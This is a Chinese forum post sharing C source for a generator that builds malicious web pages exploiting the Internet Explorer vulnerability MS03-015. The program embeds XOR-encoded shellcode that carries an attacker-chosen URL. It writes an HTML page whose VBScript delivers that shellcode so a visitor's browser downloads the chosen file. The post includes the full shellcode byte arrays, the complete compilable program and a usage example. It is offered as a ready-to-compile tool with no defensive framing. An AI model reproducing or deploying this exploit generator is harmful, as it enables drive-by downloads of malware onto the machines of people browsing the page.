MS03-015是一个IE漏洞,具体情况我就不说了,你可以去查查。
针对MS03-015的shellcode是动态生成的,我的程序能根据你输入的URL自动生成shellcode,并生成一个恶意网页。当别人浏览这个网页时能自动下载你设定的文件。(能不能执行这个文件我不知道,最后我会解释为什么我写出了工具却不太了解MS03-015)
因为我的FTP过期了,所以我帖出源代码来,你可以自己编译。我的编译环境是:Windows2000+Sp4+VC6.0
////////////////////////////////////////////////////////////
#include "stdafx.h"
#include <stdio.h>
#include <string.h>
//######################################################################
// 全局变量和函数
//######################################################################
char *url, //设定的URL
*file; //表示webshell文件的字符串
FILE *webshell, //存放shellcode的文件
*shell;
char shellcode[1200] =
"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xf4\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
"\xe8\xed\xff\xff\xff"
"\x07\x4a\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\xaa\xee\xee\xee"
"\x0c\x17\x86\x81\x80\xee\xee\x86\x9b\x9c\x82\x83\xba\x11\xf8\x65"
"\x06\x06\xc0\xee\xee\xee\x6d\x02\xce\x65\x32\x84\xce\xbd\x11\xb8"
"\xea\x29\xea\xed\xb2\x8f\xc0\x8b\x29\xaa\xed\xea\x96\x8b\xee\xee"
"\xdd\x2e\xbe\xbe\xbd\xb9\xbe\x11\xb8\xfe\x65\x32\xbe\xbd\x11\xb8"
"\xe6\x11\xb8\xe2\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0\x96\xed\x1b\xb8"
"\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b\xdd\x35\xe1\x50"
"\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05\x1f\xd5\xf1\x9b"
"\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65\xb0\xf2\xed\x33"
"\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xb9\x11\x11\x11\x60\xa0"
"\xe0\x02\x2f\x97\x0b\x56\x76\x10\x64\xe0\x90\x36\x0c\x9d\xd8\xf4"
"\xc1\x9e";
char aa[]=
"\x90\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3C\x01\x80\x34\x0A\x99\xE2"
"\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x4C\x99\x99\x99\xC3\xFD\x38"
"\xA9\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xD9\x91\x12\x41"
"\x12\xEA\xA5\x12\xED\x87\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7"
"\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A"
"\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54"
"\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF"
"\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E"
"\x1A\x5F\x97\x12\x49\xF3\x9D\xC0\x71\xC9\x99\x99\x99\x1A\x5F\x94"
"\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3\x98\xC0\x71\xA4\x99\x99\x99"
"\x1A\x5F\x8A\xCF\xDF\x19\xA7\x19\xEC\x63\x19\xAF\x19\xC7\x1A\x75"
"\xB9\x12\x45\xF3\xB9\xCA\x66\xCE\x75\x5E\x9D\x9A\xC5\xF8\xB7\xFC"
"\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99\xAA\x59\xC9\xC9\xCA\xCF\xC9\x66"
"\xCE\x65\x12\x45\xC9\xCA\x66\xCE\x69\xC9\x66\xCE\x6D\xAA\x59\x35"
"\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA"
"\x59\x5A\x71\xBF\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD"
"\xFD\xEB\xFC\xEA\xEA\x99\xDE\xFC\xED\xCA\xE0\xEA\xED\xFC\xF4\xDD"
"\xF0\xEB\xFC\xFA\xED\xF6\xEB\xE0\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC"
"\xFA\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8"
"\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7"
"\x99\xCC\xCB\xD5\xDD\xF6\xEE\xF7\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0"
"\xF5\xFC\xD8\x99";
//**************************全局函数**********************************//
void usage(char *); //帮助函数
//########################################################################
// 主函数
//########################################################################
int main(int argc,char **argv)
{
int i = 0,
j = 0,
nCount=0;
//检查用户的输入
if(argc!=3)
{
usage(argv[0]);
return 1;
}
url = argv[1]; //得到设定的URL
file = argv[2]; //得到要生成的文件
while(*url)
{
//输入的url与0xee做xor运算
*url = *url^'\xee';
shellcode[215+i++] = *url++;
}
//写出shellcode到webshell文件
/*webshell = fopen(file,"w");
for(i=0;shellcode[i];i++)
{
fprintf(webshell,"\\x%02x",(unsigned char)shellcode[i]);
}
fclose(webshell);*/
//////////**************写要生成的Webshell *************//////////////////
shell = fopen(file,"w");
fprintf(shell,"%s\n","<script language=vbs>");
fprintf(shell,"a=\"");
for(i=0;shellcode[i];i++)
{
fprintf(shell,"\\x%02x",(unsigned char)shellcode[i]);
}
fprintf(shell,"\\xee"");
fprintf(shell,"\"");
fprintf(shell,"\n");
fprintf(shell,"\'a=\"");
for(i=0;i<sizeof(aa)-1;i++)
{
fprintf(shell,"\\x%02x",(unsigned char)aa[i]);
}
fprintf(shell,"\"");
fprintf(shell,"\n");
fprintf(shell,"j=split(a,\"\\x\")");
fprintf(shell,"\n\n%s\n","for k=1 to ubound(j)-1 step 2");
fprintf(shell,"%s\n","i=i+2");
fprintf(shell,"document.write \"%%u\"+j(k+1)+j(k)");
fprintf(shell,"\n%s\n","next");
fprintf(shell,"%s\n","msgbox i");
fprintf(shell,"%s","</script>");
fclose(shell);
return 1;
}
//########################################################################
// 最初显示的帮助信息
//########################################################################
void usage(char *proname)
{
printf("\n Web shellcode creater "
"\n\nCoded by Rhett rhettxie@yahoo.com.cn 2004.11.12"
"\n\nUsage:%s <URL saved your .exe> <file to save you shellcode>"
"\n\nExample"
"\n%s www.xxxx.net/test.exe C:\\shell.html",proname,proname);
}
其中被我注释掉的部分用于生成shellcode。
PS:偶正在北京一家网络安全公司实习,同事要我写个shellcode生成程序,当时只告诉了我生成shellcode的算法和恶意网页的写法。后来我google了一下才知道是和MS03-015相关的。
注:编译时把stdafx.h放到源代码文件的同一目录下。